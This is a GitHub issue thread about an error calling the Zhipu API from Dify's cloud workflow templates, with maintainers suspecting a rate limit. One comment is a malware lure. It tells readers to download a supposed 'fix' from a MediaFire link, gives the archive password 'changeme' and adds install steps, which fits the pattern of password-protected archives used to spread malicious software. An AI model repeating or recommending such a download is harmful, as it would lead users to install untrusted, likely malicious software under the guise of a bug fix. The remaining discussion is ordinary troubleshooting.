### ISSUE TITLE
Zhipu API call error

### ISSUE THREAD

**Issue by V4me1** [langgenius/dify#7682]
### Self Checks

- [X] This is only for bug report, if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general).
- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### Dify version

https://cloud.dify.ai/

### Cloud or Self Hosted

Cloud

### Steps to reproduce

![image](https://github.com/user-attachments/assets/5222e89a-55a8-4421-966b-1d12fdeee4e4)
The official template with zhipu API will produce this error. I contacted Zhipu, they said it's a suscessful api call in their record.
I can use outdated ChatGLM_turbo api just fine.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by crazywoola** [comment]
We display this error because we received an error response, maybe it's a rate limit issue, what's your current rate limit of this model?

**Comment by V4me1** [comment]
![image](https://github.com/user-attachments/assets/d5d08f92-72e5-4408-b11e-d235a055271c)

**Comment by crazywoola** [comment]
Then I guess it's the rate limit error. Although they have processed your request, but it returns some rate limit error.

**Comment by V4me1** [comment]
I tried the Article Grading Bot with zhipu api, and it worked. 
It's strange. 
Maybe the workflow has different api requesting machenism from chatbot template

**Comment by lyx102** [comment]
有没有可能是你关闭了记忆功能？
